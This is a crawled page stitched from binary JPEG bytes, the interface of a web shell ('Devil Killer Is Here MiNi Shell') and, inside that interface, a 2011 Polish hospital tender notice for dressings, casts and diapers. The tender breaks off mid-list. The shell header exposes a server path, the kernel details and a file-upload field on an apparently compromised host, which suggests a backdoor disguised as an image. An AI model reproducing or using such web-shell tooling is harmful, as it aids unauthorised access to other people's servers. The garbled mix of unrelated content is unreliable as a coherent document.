JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/426622-N-2011.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa materiałów opatrunkowych i pieluchomajtek</b><br>
<b>Numer ogłoszenia: 426622 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych i pieluchomajtek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów opatrunkowych i pieluchomajtek określonych w pakietach nr 1- 16 ( wata, lignina, gaza, kompresy, przylepce, opaski elastyczne, opatrunki specjalistyczne, opaski gipsowe oraz środków do pielęgnacji pacjenta, pieluchomajtek itp.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,
W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia, Zamawiający wymaga, aby dostawca wykonał co najmniej dwie dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi  osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej
W celu wykazania spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej spełnieniem będzie informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Dostawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Dostawcy na kwotę nie mniejszą niż 30% wartości oferty brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty dopuszczające do obrotu i stosowania na terenie Polski zgodnie   z ustawą o wyrobach medycznych.
Odnośnie wyrobów do których nie mają zastosowania przepisy ustawy o Wyrobach Medycznych - odpowiednie dokumenty dopuszczające oferowane produkty do obrotu.
Odnośnie wyrobów chirurgicznych inwazyjnych typu: kompresy gazowe, serwety operacyjne- świadectwo potwierdzające ich rejestrację jako wyrobów Kl.2A   reguła 7.
Odnośnie pieluchomajtek dla noworodków - opinia Instytutu Matki i Dziecka  i atest PZH.
Odnośnie opasek gipsowych- Karta Danych Technicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Koszt kredytowania - 10</li>
<li>3 - Jakość - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b) sposobu konfekcjonowania
c) liczby opakowań
d) wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta
    przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie
    gorszych od  produktu objętego umową i w cenie umownej.
    g) zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym
        przypadku zmianie ulegnie kwota podatku VAT i cena brutto , cena netto
        pozostanie niezmienna, w przypadku zmiany stawki podatku VAT w ramach
        niniejszej umowy zmiana stawki następuje z dniem wejścia w życie aktu
        prawnego zmieniającego stawkę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Zespołu Opieki Zdrowotnej ul. szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2012 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej Blok C, I piętro, ul. Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki do pielęgnacji skóry:
Pianka do oczyszczania skóry z kreatyną 400 ml szt.	350
Mydło w płynie z dodatkiem panthenolu o właściwościach czyszczących 500 ml szt. 	70
Krem ochronny do skóry z kreatyną 200 ml szt.	70
Olejek ochronny do skóry w aerozolu z panthenolem 200 ml szt.	10
Wilgotne chusteczki pielęgnacyjne 20x30 cm x 50 szt., op.	50
Płyn do masażu skóry z panthenolem 500 ml szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Folie operacyjne:
Folia operacyjna 45cm x 28 cm x 10	60
Folia operacyjna 20cm x 30 cm 	50
Folia operacyjna 30cm x 40 cm 	50
Folia operacyjna 15cm x 28 cm 	90
Folia operacyjna 15cm x 20 cm 	130
Gąbka hemostatyczna specjal 70 x 50 x 1 mm x 20 	20
Gąbka hemostatyczna standard 70 x 50 x 10 mm x 20 	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opaski gipsowe:
Opaska gipsowa 4-5 min. 2m x 6cm a2 szt., szt	200
Opaska gipsowa 4-5 min. 3m x 10cm a2 szt.,szt	2 000
Opaska gipsowa 4-5 min. 3m x 12cm a2 szt., szt	4 000
Opaska gipsowa 4-5 min. 3m x 14cm a2 szt., szt	15 000
Opaska wyścielająca podgipsowa 3m x 10cm	4 000
Opaska wyścielająca podgipsowa 3m x 15cm	4 000
Opaska wyścielająca podgipsowa 3m x 25cm	300
Opaska wyścielająca podgipsowa 3m x 6 cm	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.11.41.11-3, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opaski dziane i elestyczne:
Opaska dziana wiskozowa 4m x 10cm szt. w op. jednostkowych	12 000
Opaska dziana wiskozowa 4m x 15cm szt. w op. jednostkowych	15 000
Opaska dziana wiskozowa 4m x 5cm szt. w op. jednostkowych	2 000
Opaska elastyczna z zapinką 4m x 15cm szt. w op. jednostkowych	4 000
Opaska elastyczna z zapinką 4m x 12cm szt. w op. jednostkowych	200
Opaska elastyczna dziana podtrzymująca 6cm x 4m	2 500
Opaska elastyczna dziana podtrzymująca 8cm x 4m	2 500
Opaska elastyczna dziana podtrzymująca 10cm x 4m	2 500
Opaska elastyczna dziana podtrzymująca 12cm x 4m	5 500
Elastyczna siatka opatrunkowa (głowa), w metrach	400
Elastyczna siatka opatrunkowa (tułów), w metrach	150
Elastyczna siatka opatrunkowa (b. duży tułów), w metrach	200
Opaska kohezyjna o rozciągliwości 85% 8cm x 20m	20
Opaska kohezyjna o rozciągliwości 85% 10cm x 20m	30
Opaska kohezyjna o rozciągliwości 85% 12cm x 20m	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plastry:
Plaster do łączenia ran 3 x 75-76 mm 	1 200
Plaster do łączenia ran 6 x 75-76 mm 	1 200
Plaster hypoalergiczny szer. 10 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	500
Plaster hypoalergiczny szer. 15 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	300
Plaster hypoalergiczny szer. 20 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	100
Plaster hypoalergiczny szer. 30 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	10
Plaster na jedwabiu  m. x  2,5 cm rolka pakowana pojedynczo, metrów	800
Plaster na jedwabiu  m. x  5 cm rolka pakowana pojedynczo, metrów	1 200
Plaster na włókninie m. x  2,5 cm rolka pakowana pojedynczo, metrów	100
Plaster na włókninie m. x  5 cm rolka pakowana pojedynczo, metrów	50
Plaster na folii m. x  1,25 cm rolka pakowana pojedynczo, metrów	50
Plaster na folii m. x  2,5 cm rolka pakowana pojedynczo, metrów	800
Plaster na folii  m. x  5 cm rolka pakowana pojedynczo, metrów	300
Plaster z opatrunkiem poiniekcyjny 38-40 x 10-16 mm x szt	10 000
Plaster z opatrunkiem min. 57 mm x 16 mm szt.	600
Plaster wodoodporny z opatrunkiem różne rozmiary 
